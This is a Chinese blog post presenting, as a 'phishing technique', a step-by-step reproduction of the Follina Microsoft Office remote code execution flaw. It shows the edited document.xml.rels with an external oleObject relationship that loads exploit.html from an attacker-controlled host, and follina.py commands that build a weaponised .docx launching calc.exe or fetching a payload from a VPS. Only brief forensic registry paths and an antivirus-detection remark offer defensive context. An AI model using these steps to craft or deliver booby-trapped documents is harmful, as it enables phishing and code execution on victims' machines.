钓鱼技术-Microsoft Office RCE复现
2023-02-18 16:42:19 时间
环境搭建
https://otp.landian.vip/zh-cn 下载工具进行office安装,这里使用的2021专业增强版
漏洞复现
新建一个空白docx文档,随便输入一串字符
修改后缀docx为zip,然后解压,解压后修改word\rels\document.xml.rels
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://ip:80/exploit.html!x-usc:http://ip:80/exploit.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/></Relationships>修改完重新压缩成为zip,再把后缀zip改为docx
也可以使用脚本一键生成
本地复现:
python .\follina.py -t docx -m binary -b \windows\system32\calc.exe远程复现:
把exploit.html放在vps下,使用python3 -m http.server 端口开启,使用脚本生成一个远程地址的文档
python .\follina.py -t docx -m binary -b \windows\system32\calc.exe -u VPS地址相关注册表
计算机\HKEY_CLASSES_ROOT\ms-msdt\shell\open\command
"%SystemRoot%\system32\msdt.exe" %1利用过此漏洞会留下痕迹,溯源的时候可以通过注册表进行排查
计算机\HKEY_USERS\$USER_SID\SOFTWARE\Microsoft\Office\$OFFICE_VERSION\Common\Internet\Server Cache\主流杀软已对此漏洞利用进行特征识别
火绒
360
相关文章
- 「Docker学习系列教程」9-Docker容器数据卷介绍
- 安全运维 | tcprepaly工具的安装与使用!
- 10个 解放双手的 IDEA 插件,少些冤枉代码
- 安全运维 | iptable使用详解
- 「JDK」解析 String str=““与 new String()
- 论文/代码速递2022.12.9!
- 新书《Pytorch深度学习之目标检测》!干货预览
- CVPR2022论文速递2022.7.4!最新成果demo展示
- ECCV&CVPR论文速递2022.7.5!最新成果demo展示
- ECCV2022 &CVPR2022论文速递2022.7.6!
- ECCV2022 &CVPR2022论文速递2022.7.7!
- ECCV2022 &CVPR2022论文速递2022.7.8!
- ECCV2022 &CVPR2022论文速递2022.7.11!
- ECCV2022 &CVPR2022论文速递2022.7.12!
- 阿里巴巴资深架构师深度解析微服务架构设计之SpringCloud+Dubbo
- ECCV2022 &CVPR2022论文速递2022.7.13!
- ECCV2022 &CVPR2022论文速递2022.7.14!
- 如何系统得对目标检测模型的误差分析?
- ECCV2022 &CVPR2022论文速递2022.7.15!
- ECCV2022 &CVPR2022论文速递2022.7.18!